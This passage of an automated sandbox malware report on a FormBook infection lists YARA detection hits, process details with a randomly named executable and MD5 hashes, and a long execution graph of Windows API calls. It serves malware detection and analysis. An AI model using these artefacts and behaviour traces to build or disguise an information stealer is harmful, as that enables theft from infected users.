                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3713805727.0000000005200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3713805727.0000000005200000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3705034612.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3705034612.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3713610097.00000000051C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3713610097.00000000051C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:false

                                              Target ID:15
                                              Start time:09:17:57
                                              Start date:21/07/2024
                                              Path:C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe"
                                              Imagebase:0xb00000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.3716040439.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.3716040439.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              Target ID:18
                                              Start time:09:18:15
                                              Start date:21/07/2024
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff722870000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                                Execution Graph

                                                Execution Coverage:3.9%
                                                Dynamic/Decrypted Code Coverage:0.4%
                                                Signature Coverage:2.9%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:154
                                                execution_graph 97723 69568a 97730 695c18 97723->97730 97728 6956ba Mailbox 97742 6b0ff6 97730->97742 97732 695c2b 97733 6b0ff6 Mailbox 59 API calls 97732->97733 97734 69569c 97733->97734 97735 695632 97734->97735 97780 695a2f 97735->97780 97737 695674 97737->97728 97741 6981c1 61 API calls Mailbox 97737->97741 97739 695643 97739->97737 97787 695d20 97739->97787 97793 695bda 97739->97793 97741->97728 97745 6b0ffe 97742->97745 97744 6b1018 97744->97732 97745->97744 97747 6b101c std::exception::exception 97745->97747 97752 6b594c 97745->97752 97769 6b35e1 DecodePointer 97745->97769 97770 6b87db RaiseException 97747->97770 97749 6b1046 97771 6b8711 58 API calls _free 97749->97771 97751 6b1058 97751->97732 97753 6b59c7 97752->97753 97761 6b5958 97752->97761 97778 6b35e1 DecodePointer 97753->97778 97755 6b59cd 97779 6b8d68 58 API calls __getptd_noexit 97755->97779 97758 6b598b RtlAllocateHeap 97758->97761 97768 6b59bf 97758->97768 97760 6b59b3 97776 6b8d68 58 API calls __getptd_noexit 97760->97776 97761->97758 97761->97760 97765 6b59b1 97761->97765 97766 6b5963 97761->97766 97775 6b35e1 DecodePointer 97761->97775 97777 6b8d68 58 API calls __getptd_noexit 97765->97777 97766->97761 97772 6ba3ab 58 API calls __NMSG_WRITE 97766->97772 97773 6ba408 58 API calls 5 library calls 97766->97773 97774 6b32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97766->97774 97768->97745 97769->97745 97770->97749 97771->97751 97772->97766 97773->97766 97775->97761 97776->97765 97777->97768 97778->97755 97779->97768 97781 6ce065 97780->97781 97782 695a40 97780->97782 97802 6e6443 59 API calls Mailbox 97781->97802 97782->97739 97784 6ce06f 97785 6b0ff6 Mailbox 59 API calls 97784->97785 97786 6ce07b 97785->97786 97788 695d93 97787->97788 97790 695d2e 97787->97790 97803 695dae SetFilePointerEx 97788->97803 97791 695d56 97790->97791 97792 695d66 ReadFile 97790->97792 97791->97739 97792->97790 97792->97791 97794 695bee 
97793->97794 97795 6ce117 97793->97795 97804 695b19 97794->97804 97809 6e6443 59 API calls Mailbox 97795->97809 97798 6ce122 97800 6b0ff6 Mailbox 59 API calls 97798->97800 97799 695bfa 97799->97739 97801 6ce137 _memmove 97800->97801 97802->97784 97803->97790 97805 695b31 97804->97805 97808 695b2a _memmove 97804->97808 97806 6b0ff6 Mailbox 59 API calls 97805->97806 97807 6ce0a7 97805->97807 97806->97808 97808->97799 97809->97798 97810 69107d 97815 6971eb 97810->97815 97812 69108c 97846 6b2f80 97812->97846 97816 6971fb __ftell_nolock 97815->97816 97849 6977c7 97816->97849 97820 6972ba 97861 6b074f 97820->97861 97827 6977c7 59 API calls 97828 6972eb 97827->97828 97880 697eec 97828->97880 97830 6972f4 RegOpenKeyExW 97831 6cecda RegQueryValueExW 97830->97831 97835 697316 Mailbox 97830->97835 97832 6ced6c RegCloseKey 97831->97832 97833 6cecf7 97831->97833 97832->97835 97845 6ced7e _wcscat Mailbox __NMSG_WRITE 97832->97845 97834 6b0ff6 Mailbox 59 API calls 97833->97834 97836 6ced10 97834->97836 97835->97812 97884 69538e 97836->97884 97839 6ced38 97887 697d2c 97839->97887 97841 697b52 59 API calls 97841->97845 97842 6ced52 97842->97832 97844 693f84 59 API calls 97844->97845 97845->97835 97845->97841 97845->97844 97896 697f41 97845->97896 97933 6b2e84 97846->97933 97848 691096 97850 6b0ff6 Mailbox 59 API calls 97849->97850 97851 6977e8 97850->97851 97852 6b0ff6 Mailbox 59 API calls 97851->97852 97853 6972b1 97852->97853 97854 694864 97853->97854 97900 6c1b90 97854->97900 97857 697f41 59 API calls 97858 694897 97857->97858 97902 6948ae 97858->97902 97860 6948a1 Mailbox 97860->97820 97862 6c1b90 __ftell_nolock 97861->97862 97863 6b075c GetFullPathNameW 97862->97863 97864 6b077e 97863->97864 97865 697d2c 59 API calls 97864->97865 97866 6972c5 97865->97866 97867 697e0b 97866->97867 97868 697e1f 97867->97868 97869 6cf173 97867->97869 97924 697db0 97868->97924 97929 698189 97869->97929 97872 6972d3 97874 693f84 97872->97874 97873 6cf17e __NMSG_WRITE _memmove 97875 693f92 
97874->97875 97879 693fb4 _memmove 97874->97879 97878 6b0ff6 Mailbox 59 API calls 97875->97878 97876 6b0ff6 Mailbox 59 API calls 97877 693fc8 97876->97877 97877->97827 97878->97879 97879->97876 97881 697f06 97880->97881 97883 697ef9 97880->97883 97882 6b0ff6 Mailbox 59 API calls 97881->97882 97882->97883 97883->97830 97885 6b0ff6 Mailbox 59 API calls 97884->97885 97886 6953a0 RegQueryValueExW 97885->97886 97886->97839 97886->97842 97888 697d38 __NMSG_WRITE 97887->97888 97889 697da5 97887->97889 97891 697d4e 97888->97891 97892 697d73 97888->97892 97890 697e8c 59 API calls 97889->97890 97895 697d56 _memmove 97890->97895 97932 698087 59 API calls Mailbox 97891->97932 97893 698189 59 API calls 97892->97893 97893->97895 97895->97842 97897 697f50 __NMSG_WRITE _memmove 97896->97897 97898 6b0ff6 Mailbox 59 API calls 97897->97898 97899 697f8e 97898->97899 97899->97845 97901 694871 GetModuleFileNameW 97900->97901 97901->97857 97903 6c1b90 __ftell_nolock 97902->97903 97904 6948bb GetFullPathNameW 97903->97904 97905 6948da 97904->97905 97906 6948f7 97904->97906 97908 697d2c 59 API calls 97905->97908 97907 697eec 59 API calls 97906->97907 97909 6948e6 97907->97909 97908->97909 97912 697886 97909->97912 97913 697894 97912->97913 97916 697e8c 97913->97916 97915 6948f2 97915->97860 97917 697e9a 97916->97917 97919 697ea3 _memmove 97916->97919 97917->97919 97920 697faf 97917->97920 97919->97915 97921 697fc2 97920->97921 97923 697fbf _memmove 97920->97923 97922 6b0ff6 Mailbox 59 API calls 97921->97922 97922->97923 97923->97919 97925 697dbf __NMSG_WRITE 97924->97925 97926 698189 59 API calls 97925->97926 97927 697dd0 _memmove 97925->97927 97928 6cf130 _memmove 97926->97928 97927->97872 97930 6b0ff6 Mailbox 59 API calls 97929->97930 97931 698193 97930->97931 97931->97873 97932->97895 97934 6b2e90 __tzset_nolock 97933->97934 97941 6b3457 97934->97941 97940 6b2eb7 __tzset_nolock 97940->97848 97958 6b9e4b 97941->97958 97943 6b2e99 97944 6b2ec8 DecodePointer DecodePointer 97943->97944 
97945 6b2ea5 97944->97945 97946 6b2ef5 97944->97946 97955 6b2ec2 97945->97955 97946->97945 98004 6b89e4 59 API calls __ftell_nolock 97946->98004 97948 6b2f58 EncodePointer EncodePointer 97948->97945 97949 6b2f2c 97949->97945 97953 6b2f46 EncodePointer 97949->97953 98006 6b8aa4 61 API calls 2 library calls 97949->98006 97950 6b2f07 97950->97948 97950->97949 98005 6b8aa4 61 API calls 2 library calls 97950->98005 97953->97948 97954 6b2f40 97954->97945 97954->97953 98007 6b3460 97955->98007 97959 6b9e6f EnterCriticalSection 97958->97959 97960 6b9e5c 97958->97960 97959->97943 97965 6b9ed3 97960->97965 97962 6b9e62 97962->97959 97989 6b32f5 58 API calls 3 library calls 97962->97989 97966 6b9edf __tzset_nolock 97965->97966 97967 6b9ee8 97966->97967 97968 6b9f00 97966->97968 97990 6ba3ab 58 API calls __NMSG_WRITE 97967->97990 97973 6b9f21 __tzset_nolock 97968->97973 97993 6b8a5d 58 API calls 2 library calls 97968->97993 97971 6b9eed 97991 6ba408 58 API calls 5 library calls 97971->97991 97972 6b9f15 97975 6b9f2b 97972->97975 97976 6b9f1c 97972->97976 97973->97962 97979 6b9e4b __lock 58 API calls 97975->97979 97994 6b8d68 58 API calls __getptd_noexit 97976->97994 97977 6b9ef4 97992 6b32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97977->97992 97982 6b9f32 97979->97982 97983 6b9f3f 97982->97983 97984 6b9f57 97982->97984 97995 6ba06b InitializeCriticalSectionAndSpinCount 97983->97995 97996 6b2f95 97984->97996 97987 6b9f4b 98002 6b9f73 LeaveCriticalSection _doexit 97987->98002 97990->97971 97991->97977 97993->97972 97994->97973 97995->97987 97997 6b2fc7 __dosmaperr 97996->97997 97998 6b2f9e RtlFreeHeap 97996->97998 97997->97987 97998->97997 97999 6b2fb3 97998->97999 98003 6b8d68 58 API calls __getptd_noexit 97999->98003 98001 6b2fb9 GetLastError 98001->97997 98002->97973 98003->98001 98004->97950 98005->97949 98006->97954 98010 6b9fb5 LeaveCriticalSection 98007->98010 98009 6b2ec7 98009->97940 98010->98009 98011 15423b0 98025 1540000 98011->98025 98013 
15424c9 98028 15422a0 98013->98028 98031 1543500 GetPEB 98025->98031 98027 154068b 98027->98013 98029 15422a9 Sleep 98028->98029 98030 15422b7 98029->98030 98032 154352a 98031->98032 98032->98027 98033 69b56e 98040 6afb84 98033->98040 98035 69b584 98049 69c707 98035->98049 98037 69b5ac 98038 69a4e8 98037->98038 98061 6fa0b5 89 API calls 4 library calls 98037->98061 98041 6afba2 98040->98041 98042 6afb90 98040->98042 98044 6afba8 98041->98044 98045 6afbd1 98041->98045 98062 699e9c 60 API calls Mailbox 98042->98062 98046 6b0ff6 Mailbox 59 API calls 98044->98046 98063 699e9c 60 API calls Mailbox 98045->98063 98048 6afb9a 98046->98048 98048->98035 98064 697b76 98049->98064 98051 69c72c _wcscmp 98052 697f41 59 API calls 98051->98052 98053 69c760 Mailbox 98051->98053 98054 6d1abb 98052->98054 98053->98037 98069 697c8e 98054->98069 98058 6d1ad7 98060 6d1adb Mailbox 98058->98060 98079 699e9c 60 API calls Mailbox 98058->98079 98060->98037 98061->98038 98062->98048 98063->98048 98065 6b0ff6 Mailbox 59 API calls 98064->98065 98066 697b9b 98065->98066 98067 698189 59 API calls 98066->98067 98068 697baa 98067->98068 98068->98051 98070 6cf094 98069->98070 98071 697ca0 98069->98071 98086 6e8123 59 API calls _memmove 98070->98086 98080 697bb1 98071->98080 98074 697cac 98078 69859a 68 API calls 98074->98078 98075 6cf09e 98087 6981a7 98075->98087 98077 6cf0a6 Mailbox 98078->98058 98079->98060 98081 697bbf 98080->98081 98085 697be5 _memmove 98080->98085 98082 6b0ff6 Mailbox 59 API calls 98081->98082 98081->98085 98083 697c34 98082->98083 98084 6b0ff6 Mailbox 59 API calls 98083->98084 98084->98085 98085->98074 98086->98075 98088 6981ba 98087->98088 98089 6981b2 98087->98089 98088->98077 98091 6980d7 59 API calls 2 library calls 98089->98091 98091->98088 98092 6b7e93 98093 6b7e9f __tzset_nolock 98092->98093 98129 6ba048 GetStartupInfoW 98093->98129 98095 6b7ea4 98131 6b8dbc GetProcessHeap 98095->98131 98097 6b7efc 98098 6b7f07 98097->98098 98214 6b7fe3 58 API calls 3 library calls 
99668 69766f 59 API calls 2 library calls 99529->99668 99533 6ceb69 99674 6f7581 59 API calls Mailbox 99533->99674 99538 6ceb8b 99675 6ff835 59 API calls 2 library calls 99538->99675 99541 6ceb98 99543 6b2f95 _free 58 API calls 99541->99543 99543->99545 99574 695934 99545->99574 99557 697f41 59 API calls 99564 6ce978 Mailbox 99557->99564 99561 6cebbb 99676 6efcb1 89 API calls 4 library calls 99561->99676 99563 6cebd4 99565 6b2f95 _free 58 API calls 99563->99565 99564->99533 99564->99557 99564->99561 99669 6efc4d 59 API calls 2 library calls 99564->99669 99670 6efb6e 61 API calls 2 library calls 99564->99670 99671 6f7621 59 API calls Mailbox 99564->99671 99672 69766f 59 API calls 2 library calls 99564->99672 99673 697373 59 API calls Mailbox 99564->99673 99566 6cebe7 99565->99566 99566->99545 99567->99451 99568->99463 99569->99463 99570->99463 99571->99463 99572->99463 99573->99460 99575 695dcf CloseHandle 99574->99575 99576 69593c Mailbox 99575->99576 99577 695dcf CloseHandle 99576->99577 99578 69594b 99577->99578 99578->99526 99579->99480 99581 695dcf CloseHandle 99580->99581 99582 695962 99581->99582 99679 695df9 99582->99679 99584 695981 99588 6959a4 99584->99588 99687 695770 99584->99687 99586 695993 99704 6953db SetFilePointerEx SetFilePointerEx 99586->99704 99588->99479 99588->99483 99589 6ce030 99705 6f3696 SetFilePointerEx SetFilePointerEx WriteFile 99589->99705 99590 69599a 99590->99588 99590->99589 99592 6ce060 99592->99588 99593->99490 99594->99511 99602 695c68 99595->99602 99596 695cef SetFilePointerEx 99711 695dae SetFilePointerEx 99596->99711 99597 6ce151 99712 695dae SetFilePointerEx 99597->99712 99600 695cc3 99600->99489 99601 6ce16b 99602->99596 99602->99597 99602->99600 99604 6977c7 59 API calls 99603->99604 99605 69470f 99604->99605 99606 6977c7 59 API calls 99605->99606 99607 694717 99606->99607 99608 6977c7 59 API calls 99607->99608 99609 69471f 99608->99609 99610 6977c7 59 API calls 99609->99610 99611 694727 99610->99611 99612 69475b 
99611->99612 99613 6cd8fb 99611->99613 99614 6979ab 59 API calls 99612->99614 99615 6981a7 59 API calls 99613->99615 99616 694769 99614->99616 99617 6cd904 99615->99617 99618 697e8c 59 API calls 99616->99618 99619 697eec 59 API calls 99617->99619 99620 694773 99618->99620 99622 69479e 99619->99622 99621 6979ab 59 API calls 99620->99621 99620->99622 99624 694794 99621->99624 99625 6947bd 99622->99625 99626 6cd924 99622->99626 99640 6947de 99622->99640 99628 697e8c 59 API calls 99624->99628 99630 697b52 59 API calls 99625->99630 99629 6cd9f4 99626->99629 99637 6cd9dd 99626->99637 99648 6cd95b 99626->99648 99627 6947ef 99632 6981a7 59 API calls 99627->99632 99633 694801 99627->99633 99628->99622 99631 697d2c 59 API calls 99629->99631 99635 6947c7 99630->99635 99649 6cd9b1 99631->99649 99632->99633 99634 694811 99633->99634 99636 6981a7 59 API calls 99633->99636 99638 694818 99634->99638 99641 6981a7 59 API calls 99634->99641 99639 6979ab 59 API calls 99635->99639 99635->99640 99636->99634 99637->99629 99644 6cd9c8 99637->99644 99642 6981a7 59 API calls 99638->99642 99651 69481f Mailbox 99638->99651 99639->99640 99713 6979ab 99640->99713 99641->99638 99642->99651 99643 697b52 59 API calls 99643->99649 99647 697d2c 59 API calls 99644->99647 99645 6cd9b9 99646 697d2c 59 API calls 99645->99646 99646->99649 99647->99649 99648->99645 99652 6cd9a4 99648->99652 99649->99640 99649->99643 99726 697a84 59 API calls 2 library calls 99649->99726 99651->99509 99653 697d2c 59 API calls 99652->99653 99653->99649 99665->99479 99666->99486 99667->99514 99668->99564 99669->99564 99670->99564 99671->99564 99672->99564 99673->99564 99674->99538 99675->99541 99676->99563 99680 695e12 CreateFileW 99679->99680 99681 6ce181 99679->99681 99684 695e34 99680->99684 99682 6ce187 CreateFileW 99681->99682 99681->99684 99683 6ce1ad 99682->99683 99682->99684 99685 695c4e 2 API calls 99683->99685 99684->99584 99686 6ce1b8 99685->99686 99686->99684 99688 6cdfce 99687->99688 99689 69578b 99687->99689 
99690 69581a 99688->99690 99706 695e3f 99688->99706 99689->99690 99691 695c4e 2 API calls 99689->99691 99690->99586 99692 6957ad 99691->99692 99693 69538e 59 API calls 99692->99693 99695 6957b7 99693->99695 99695->99688 99696 6957c4 99695->99696 99697 6b0ff6 Mailbox 59 API calls 99696->99697 99698 6957cf 99697->99698 99699 69538e 59 API calls 99698->99699 99700 6957da 99699->99700 99701 695d20 2 API calls 99700->99701 99702 695807 99701->99702 99703 695c4e 2 API calls 99702->99703 99703->99690 99704->99590 99705->99592 99707 695c4e 2 API calls 99706->99707 99708 695e60 99707->99708 99709 695c4e 2 API calls 99708->99709 99710 695e74 99709->99710 99710->99690 99711->99600 99712->99601 99714 6979ba 99713->99714 99715 697a17 99713->99715 99714->99715 99717 6979c5 99714->99717 99716 697e8c 59 API calls 99715->99716 99723 6979e8 _memmove 99716->99723 99718 6979e0 99717->99718 99719 6cef32 99717->99719 99727 698087 59 API calls Mailbox 99718->99727 99720 698189 59 API calls 99719->99720 99722 6cef3c 99720->99722 99724 6b0ff6 Mailbox 59 API calls 99722->99724 99723->99627 99725 6cef5c 99724->99725 99726->99649 99727->99723 99729 696ef5 99728->99729 99733 697009 99728->99733 99730 6b0ff6 Mailbox 59 API calls 99729->99730 99729->99733 99732 696f1c 99730->99732 99731 6b0ff6 Mailbox 59 API calls 99734 696f91 99731->99734 99732->99731 99733->98446 99734->99733 99741 6963a0 99734->99741 99767 6974bd 59 API calls Mailbox 99734->99767 99768 6e6ac9 59 API calls Mailbox 99734->99768 99769 69766f 59 API calls 2 library calls 99734->99769 99739->98449 99740->98451 99742 697b76 59 API calls 99741->99742 99759 6963c5 99742->99759 99743 6965ca 99745 6965e4 Mailbox 99745->99734 99748 6ce41f 99775 6efdba 91 API calls 4 library calls 99748->99775 99749 6ce3eb _memmove 99749->99748 99757 6968f9 99749->99757 99750 69766f 59 API calls 99750->99759 99755 697eec 59 API calls 99755->99759 99757->99745 99777 6efdba 91 API calls 4 library calls 99757->99777 99759->99743 99759->99748 99759->99749 
99759->99750 99759->99755 99759->99757 99760 6ce3bb 99759->99760 99764 697faf 59 API calls 99759->99764 99770 6960cc 60 API calls 99759->99770 99771 695ea1 59 API calls Mailbox 99759->99771 99773 695fd2 60 API calls 99759->99773 99774 697a84 59 API calls 2 library calls 99759->99774 99761 698189 59 API calls 99760->99761 99767->99734 99768->99734 99769->99734 99770->99759 99771->99759 99773->99759 99774->99759 99777->99745 99778->98464 99779->98465 100197 693633 100198 69366a 100197->100198 100199 693688 100198->100199 100200 6936e7 100198->100200 100241 6936e5 100198->100241 100201 69375d PostQuitMessage 100199->100201 100202 693695 100199->100202 100204 6cd31c 100200->100204 100205 6936ed 100200->100205 100209 6936d8 100201->100209 100206 6cd38f 100202->100206 100207 6936a0 100202->100207 100203 6936ca DefWindowProcW 100203->100209 100247 6a11d0 10 API calls Mailbox 100204->100247 100210 6936f2 100205->100210 100211 693715 SetTimer RegisterWindowMessageW 100205->100211 100252 6f2a16 71 API calls _memset 100206->100252 100212 6936a8 100207->100212 100213 693767 100207->100213 100217 6936f9 KillTimer 100210->100217 100218 6cd2bf 100210->100218 100211->100209 100214 69373e CreatePopupMenu 100211->100214 100219 6cd374 100212->100219 100220 6936b3 100212->100220 100245 694531 64 API calls _memset 100213->100245 100214->100209 100216 6cd343 100248 6a11f3 331 API calls Mailbox 100216->100248 100242 6944cb Shell_NotifyIconW _memset 100217->100242 100224 6cd2f8 MoveWindow 100218->100224 100225 6cd2c4 100218->100225 100219->100203 100251 6e817e 59 API calls Mailbox 100219->100251 100227 69374b 100220->100227 100228 6936be 100220->100228 100221 6cd3a1 100221->100203 100221->100209 100224->100209 100230 6cd2c8 100225->100230 100231 6cd2e7 SetFocus 100225->100231 100244 6945df 81 API calls _memset 100227->100244 100228->100203 100249 6944cb Shell_NotifyIconW _memset 100228->100249 100229 69375b 100229->100209 100230->100228 100236 6cd2d1 100230->100236 100231->100209 100232 
69370c 100243 693114 DeleteObject DestroyWindow Mailbox 100232->100243 100246 6a11d0 10 API calls Mailbox 100236->100246 100239 6cd368 100250 6943db 68 API calls _memset 100239->100250 100241->100203 100242->100232 100243->100209 100244->100229 100245->100229 100246->100209 100247->100216 100248->100228 100249->100239 100250->100241 100251->100241 100252->100221 100253 6cff06 100254 6cff10 100253->100254 100292 69ac90 Mailbox _memmove 100253->100292 100448 698e34 59 API calls Mailbox 100254->100448 100258 69b685 100453 6fa0b5 89 API calls 4 library calls 100258->100453 100259 6b0ff6 59 API calls Mailbox 100277 69a097 Mailbox 100259->100277 100261 69b5d5 100266 6981a7 59 API calls 100261->100266 100264 6981a7 59 API calls 100264->100277 100275 69a1b7 100266->100275 100267 6d047f 100452 6fa0b5 89 API calls 4 library calls 100267->100452 100269 697f41 59 API calls 100269->100292 100271 6977c7 59 API calls 100271->100277 100272 6e7405 59 API calls 100272->100277 100273 6d048e 100274 6b2f80 67 API calls __cinit 100274->100277 100277->100259 100277->100261 100277->100264 100277->100267 100277->100271 100277->100272 100277->100274 100277->100275 100279 6d0e00 100277->100279 100282 69b5da 100277->100282 100283 69a6ba 100277->100283 100443 69ca20 331 API calls 2 library calls 100277->100443 100444 69ba60 60 API calls Mailbox 100277->100444 100278 6e66f4 Mailbox 59 API calls 100278->100275 100456 6fa0b5 89 API calls 4 library calls 100279->100456 100281 70bf80 331 API calls 100281->100292 100457 6fa0b5 89 API calls 4 library calls 100282->100457 100455 6fa0b5 89 API calls 4 library calls 100283->100455 100285 6b0ff6 59 API calls Mailbox 100285->100292 100286 69a000 331 API calls 100286->100292 100288 6d0c94 100289 699df0 Mailbox 59 API calls 100288->100289 100293 6d0c86 100289->100293 100290 6d0ca2 100454 6fa0b5 89 API calls 4 library calls 100290->100454 100292->100258 100292->100269 100292->100275 100292->100277 100292->100281 100292->100285 100292->100286 100292->100288 
100292->100290 100294 69b37c 100292->100294 100299 69b416 100292->100299 100302 69ade2 Mailbox 100292->100302 100402 70c5f4 100292->100402 100434 6f7be0 100292->100434 100440 6e66f4 100292->100440 100449 6e7405 59 API calls 100292->100449 100450 70c4a7 85 API calls 2 library calls 100292->100450 100293->100275 100293->100278 100445 699e9c 60 API calls Mailbox 100294->100445 100297 69b38d 100446 699e9c 60 API calls Mailbox 100297->100446 100447 69f803 331 API calls 100299->100447 100301 699df0 Mailbox 59 API calls 100301->100302 100302->100258 100302->100275 100302->100293 100302->100301 100303 6d00e0 VariantClear 100302->100303 100308 70474d 331 API calls 100302->100308 100309 70e237 100302->100309 100312 70e24b 100302->100312 100315 6fd2e6 100302->100315 100362 6a2123 100302->100362 100451 6e7405 59 API calls 100302->100451 100303->100302 100308->100302 100458 70cdf1 100309->100458 100311 70e247 100311->100302 100313 70cdf1 130 API calls 100312->100313 100314 70e25b 100313->100314 100314->100302 100316 6fd310 100315->100316 100317 6fd305 100315->100317 100319 6fd3ea Mailbox 100316->100319 100322 6977c7 59 API calls 100316->100322 100548 699c9c 59 API calls 100317->100548 100320 6b0ff6 Mailbox 59 API calls 100319->100320 100358 6fd3f3 Mailbox 100319->100358 100321 6fd433 100320->100321 100323 6fd43f 100321->100323 100551 695906 60 API calls Mailbox 100321->100551 100324 6fd334 100322->100324 100328 699997 84 API calls 100323->100328 100326 6977c7 59 API calls 100324->100326 100327 6fd33d 100326->100327 100329 699997 84 API calls 100327->100329 100330 6fd457 100328->100330 100332 6fd349 100329->100332 100331 695956 67 API calls 100330->100331 100333 6fd466 100331->100333 100334 6946f9 59 API calls 100332->100334 100335 6fd49e 100333->100335 100336 6fd46a GetLastError 100333->100336 100337 6fd35e 100334->100337 100341 6fd4c9 100335->100341 100342 6fd500 100335->100342 100338 6fd483 100336->100338 100339 697c8e 59 API calls 100337->100339 100338->100358 100552 695a1a 
CloseHandle 100338->100552 100340 6fd391 100339->100340 100344 6fd3e3 100340->100344 100349 6f3e73 3 API calls 100340->100349 100343 6b0ff6 Mailbox 59 API calls 100341->100343 100345 6b0ff6 Mailbox 59 API calls 100342->100345 100346 6fd4ce 100343->100346 100550 699c9c 59 API calls 100344->100550 100350 6fd505 100345->100350 100351 6fd4df 100346->100351 100353 6977c7 59 API calls 100346->100353 100352 6fd3a1 100349->100352 100355 6977c7 59 API calls 100350->100355 100350->100358 100553 6ff835 59 API calls 2 library calls 100351->100553 100352->100344 100354 6fd3a5 100352->100354 100353->100351 100357 697f41 59 API calls 100354->100357 100355->100358 100359 6fd3b2 100357->100359 100358->100302 100549 6f3c66 63 API calls Mailbox 100359->100549 100361 6fd3bb Mailbox 100361->100344 100363 699bf8 59 API calls 100362->100363 100364 6a213b 100363->100364 100365 6b0ff6 Mailbox 59 API calls 100364->100365 100369 6d69af 100364->100369 100367 6a2154 100365->100367 100368 6a2164 100367->100368 100569 695906 60 API calls Mailbox 100367->100569 100372 699997 84 API calls 100368->100372 100370 6a2189 100369->100370 100573 6ff7df 59 API calls 100369->100573 100378 6a2196 100370->100378 100574 699c9c 59 API calls 100370->100574 100374 6a2172 100372->100374 100376 695956 67 API calls 100374->100376 100375 6d69f7 100377 6d69ff 100375->100377 100375->100378 100379 6a2181 100376->100379 100575 699c9c 59 API calls 100377->100575 100381 695e3f 2 API calls 100378->100381 100379->100369 100379->100370 100572 695a1a CloseHandle 100379->100572 100383 6a219d 100381->100383 100384 6d6a11 100383->100384 100385 6a21b7 100383->100385 100387 6b0ff6 Mailbox 59 API calls 100384->100387 100386 6977c7 59 API calls 100385->100386 100388 6a21bf 100386->100388 100389 6d6a17 100387->100389 100554 6956d2 100388->100554 100391 6d6a2b 100389->100391 100576 6959b0 ReadFile SetFilePointerEx 100389->100576 100396 6d6a2f _memmove 100391->100396 100577 6f794e 59 API calls 2 library calls 100391->100577 100393 
6a21ce 100393->100396 100570 699b9c 59 API calls Mailbox 100393->100570 100397 6a21e2 Mailbox 100398 6a221c 100397->100398 100399 695dcf CloseHandle 100397->100399 100398->100302 100400 6a2210 100399->100400 100400->100398 100571 695a1a CloseHandle 100400->100571 100403 6977c7 59 API calls 100402->100403 100404 70c608 100403->100404 100405 6977c7 59 API calls 100404->100405 100406 70c610 100405->100406 100407 6977c7 59 API calls 100406->100407 100408 70c618 100407->100408 100409 699997 84 API calls 100408->100409 100433 70c626 100409->100433 100410 697d2c 59 API calls 100410->100433 100411 70c80f 100412 70c83c Mailbox 100411->100412 100582 699b9c 59 API calls Mailbox 100411->100582 100412->100292 100414 70c7f6 100416 697e0b 59 API calls 100414->100416 100415 6981a7 59 API calls 100415->100433 100418 70c803 100416->100418 100417 70c811 100420 697e0b 59 API calls 100417->100420 100422 697c8e 59 API calls 100418->100422 100419 697a84 59 API calls 100419->100433 100423 70c820 100420->100423 100421 697faf 59 API calls 100425 70c6bd CharUpperBuffW 100421->100425 100422->100411 100426 697c8e 59 API calls 100423->100426 100424 697faf 59 API calls 100427 70c77d CharUpperBuffW 100424->100427 100581 69859a 68 API calls 100425->100581 100426->100411 100429 69c707 69 API calls 100427->100429 100429->100433 100430 699997 84 API calls 100430->100433 100431 697e0b 59 API calls 100431->100433 100432 697c8e 59 API calls 100432->100433 100433->100410 100433->100411 100433->100412 100433->100414 100433->100415 100433->100417 100433->100419 100433->100421 100433->100424 100433->100430 100433->100431 100433->100432 100435 6f7bec 100434->100435 100436 6b0ff6 Mailbox 59 API calls 100435->100436 100437 6f7bfa 100436->100437 100438 6977c7 59 API calls 100437->100438 100439 6f7c08 100437->100439 100438->100439 100439->100292 100583 6e6636 100440->100583 100442 6e6702 100442->100292 100443->100277 100444->100277 100445->100297 100446->100299 100447->100258 100448->100292 100449->100292 
